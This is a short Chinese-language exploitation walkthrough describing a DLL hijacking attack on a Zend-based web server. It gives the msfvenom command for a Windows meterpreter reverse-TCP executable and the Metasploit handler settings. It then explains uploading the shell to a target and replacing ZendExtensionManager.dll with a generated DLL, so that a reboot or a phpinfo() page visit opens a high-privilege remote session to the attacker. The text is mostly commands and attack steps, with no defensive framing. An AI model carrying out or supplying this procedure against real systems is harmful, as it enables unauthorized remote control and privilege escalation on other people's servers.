1. 漏洞利用过程

  msfconsole生成反弹shell:

  msfvenom -p windows/meterpreter/reverse_tcp lhost=kali的ip port=端口 -f exe > /var/www/html/shell.exe

  在其中一个dos框中进行监听:

    use exploit/multi/handler

    set payload windows/meterpreter/reverse_tcp

    set lhost kaliip

    set lport 设置端口

    run/exploit

  将生成的shell.exe上传到靶机中。然后打开Zend_DLL_Hijacking.exe,填入exe路径。DLL路径就是改过名字的原来的ZendExtensionManager.dll的路径。然后生成DLL文件。随后将生成的DLL文件上传到原ZendExtensionManager.dll路径位置顶替冒充。一旦靶机重新启动或者攻击者重新访问web页面(例如其中的phpinfo())就会重新加载dll,此时msf便会监听到对话并且权限为高权限。